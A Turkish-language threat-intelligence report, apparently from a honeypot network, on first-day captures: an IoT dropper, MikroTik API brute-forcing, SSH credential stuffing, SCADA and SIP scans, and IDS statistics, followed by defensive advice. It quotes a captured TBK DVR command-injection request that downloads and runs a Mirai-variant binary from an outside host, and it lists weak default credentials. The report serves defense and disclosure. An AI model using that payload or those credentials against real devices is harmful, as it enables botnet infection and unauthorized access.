← Tüm Yazılar
HIGH 7 Nisan 2026

Canlı İstihbarat Başladı — 16 Honeypot, 2 Veri Merkezi, İlk Bulgular

İstanbul ve Sakarya veri merkezlerinde 16 farklı honeypot tipi aktif. İlk 24 saatte IoT malware dropper, MikroTik API brute-force kampanyası, SCADA taraması ve SSH credential stuffing yakalandı.

Özet — İki Şehir, Bir Ağ

Tellal honeypot ağı bugün itibarıyla çift veri merkezli yapıya geçti. İstanbul ve Sakarya DC’lerinde toplam 16 farklı honeypot tipi aktif olarak veri topluyor.

MetrikDeğer
Aktif honeypot tipi16
Veri merkeziİstanbul + Sakarya
Son 24 saat toplam event420.000+
Benzersiz saldırgan IP6.009
Ülke sayısı15+
IoC veritabanı toplam6.776

Önceki raporlarda sadece Suricata IDS ve P0f pasif fingerprint verimiz vardı. Bugünden itibaren Cowrie (SSH), Dionaea (SMB/DB), Heralding (auth), Tanner/Snare (web), Mailoney (SMTP), ConPot (ICS/SCADA), SentryPeer (SIP), Glutton (catch-all) ve özel honeypot’larımız (MikroTik API, Redis, Elasticsearch, Docker API, WinRM, K8s) aktif veri üretiyor.


Bugünün Öne Çıkan Bulguları

1. IoT Malware Dropper — Mirai Varyantı

176.65.148.127 (Rusya, AS211298 Driftnet) web honeypot’umuza bir IoT cihaz exploit payload’u gönderdi:

GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=
cd /tmp;rm arm7; wget http://87.121.112.57/kkk.arm7;
chmod 777 kkk.arm7; ./kkk.arm7 tbk.ebk; rm -rf kkk.arm7

Analiz:

  • Hedef: TBK DVR/NVR cihazları (güvenlik kameraları)
  • Exploit: ___S_O_S_T_R_E_A_MAX___ — bilinen bir TBK command injection zafiyeti
  • Payload: kkk.arm7 — ARM7 mimarisi için derlenmiş ELF binary (Mirai varyantı)
  • C2: 87.121.112.57 (Bulgaristan)
  • Teknik: İndir → çalıştır → kendini sil (anti-forensic)

Risk: Türkiye’de yaygın kullanılan TBK/Provision marka DVR’lar bu zafiyete açık. Cihazınız internete açıksa ve firmware güncel değilse, botnet’e dahil edilebilir.

IoC:

  • Saldırgan: 176.65.148.127
  • C2/Dropper: 87.121.112.57
  • Payload: kkk.arm7 (SHA256 doğrulama bekliyor)
  • URI pattern: /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___

2. MikroTik API Brute-Force Kampanyası

Glutton honeypot’umuz port 8728 (MikroTik API) üzerinde yoğun bir credential stuffing kampanyası yakaladı.

IPHitKaynak
45.205.1.110189
45.205.1.5112
185.91.127.8518
160.119.76.5714

Toplam: 891 deneme / 24 saat. Saldırganlar /login API endpoint’ine rastgele 4 karakterlik kullanıcı adı ve tek karakterlik şifrelerle istek gönderiyor — dictionary attack değil, brute-force.

Payload örneği:

/login
=name=9J9l
=password=s

Risk: MikroTik RouterOS API (8728) varsayılanda açıktır. Güçlü şifre + IP kısıtlama + API devre dışı bırakma önerilir.


3. SSH Credential Stuffing

Cowrie SSH honeypot’umuz 14 başarısız giriş denemesi yakaladı. Küçük sayı gibi görünse de honeypot yeni aktif — saldırgan sayısı saatler içinde artacak.

En çok denenen kimlik bilgileri:

  • admin / Admin12345 — 4 deneme
  • root / admin123 — 2 deneme
  • nobody / nobody7 — 2 deneme

Saldırgan profili:

  • 7 benzersiz IP, 5 farklı ülke
  • 78.187.9.111 — Türkiye (Türk Telekom), aktif SSH scanner

Bunlar varsayılan/zayıf kimlik bilgileri. admin/Admin12345 kombinasyonu özellikle IoT cihaz ve yönetim panellerinde yaygın.


4. SCADA/ICS Taraması

ConPot endüstriyel kontrol sistemi honeypot’umuz port 10001 (Guardian AST — tank gauge protokolü) üzerinde tarama yakaladı.

  • 91.231.89.180 ve 91.231.89.57 (Ukrayna) — aynı /24 subnet
  • Hedef: Benzin istasyonu tank seviye ölçüm sistemleri

Bu taramalar genellikle Shodan/Censys benzeri araştırma amaçlıdır, ancak aynı teknik gerçek saldırılarda da kullanılır. ICS/SCADA sistemlerinizi asla doğrudan internete açmayın.


5. SIP Fraud Denemesi

SentryPeer honeypot’umuz 23.153.217.65 IP’sinden SIP INVITE istekleri yakaladı. Bu tip saldırılarda amaç:

  • PBX sistemine sızma
  • Premium numaralara yönlendirme (International Revenue Share Fraud)
  • Kurban faturasına yüksek tutarlar yansıtma

VoIP/PBX sisteminiz varsa: SIP trunk’larınızı IP bazlı kısıtlayın, uluslararası arama limitlerini aktif edin.


6. Suricata IDS — Ağ Seviyesi Tehditler

SignatureSayıAçıklama
NMAP -sS scan448Port tarama (27+ farklı IP)
MySQL inbound scan342Veritabanı keşfi
CVE-2024-6387 (regreSSHion)313OpenSSH RCE zafiyet tespiti
Dshield Block Listed1.328Bilinen kötücül kaynak
SSH Scan1.020SSH brute-force
SOCKS Proxy attempt24.384Proxy abuse

CVE-2024-6387 (regreSSHion): OpenSSH 8.5p1-9.7p1 arası versiyonlarda race condition ile root RCE. Suricata bu zafiyete sahip SSH banner’larını tespit ediyor. OpenSSH’ınızı güncelleyin.


Saldırı Coğrafyası

ÜlkeEventOran
Fransa59.366%14
ABD25.785%6
Brezilya13.550%3
Almanya12.490%3
Hollanda12.119%3
Singapur9.333%2
Türkiye1.481~%0.4

Fransa’nın yüksek oranı büyük oranda OVH/Scaleway cloud altyapısından gelen otomatik taramalardan kaynaklanıyor.


Honeypot Mimarisi

┌─────────────────┐     ┌─────────────────┐
│  İstanbul DC    │     │  Sakarya DC     │
│  Sensor Node    │────▶│  Sensor Node    │
│  Multi-honeypot │ WG  │  Multi-honeypot │
└────────┬────────┘     └────────┬────────┘
         │                       │
         ▼                       ▼
    ┌──────────────────────────────┐
    │  Merkezi Analiz Platformu   │
    │  Elasticsearch + Logstash   │
    └──────────────────────────────┘

Her iki DC’den gelen veriler merkezi analiz platformunda birleşiyor. Tüm IoC verileri CC0 lisansı ile Feed Hub’da yayınlanıyor.


Ne Yapmalı?

  1. DVR/NVR firmware güncelleyin — TBK cihazları hedef altında
  2. MikroTik API (8728) kapatın veya IP kısıtlayın
  3. SSH’da admin/root + basit şifre kullanmayın — key-based auth geçin
  4. OpenSSH güncelleyin — CVE-2024-6387 aktif olarak taranıyor
  5. SIP trunk’larınızı IP bazlı kısıtlayın
  6. ICS/SCADA sistemlerini internetten izole edin